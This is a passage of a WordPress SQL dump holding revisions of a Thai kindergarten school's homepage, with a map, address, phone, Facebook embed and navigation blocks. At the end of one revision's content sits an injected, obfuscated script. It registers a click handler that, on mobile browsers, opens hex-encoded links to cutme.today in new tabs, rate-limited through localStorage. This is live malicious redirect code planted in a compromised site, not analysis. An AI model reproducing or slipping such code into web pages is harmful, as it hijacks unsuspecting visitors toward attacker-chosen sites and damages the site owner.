src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-26 16:17:05','2024-08-26 09:17:05','',19,'http://watprato.ssk.in.th/?p=216',0,'revision','',0),
(217,2,'2024-08-26 16:24:17','2024-08-26 09:24:17','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 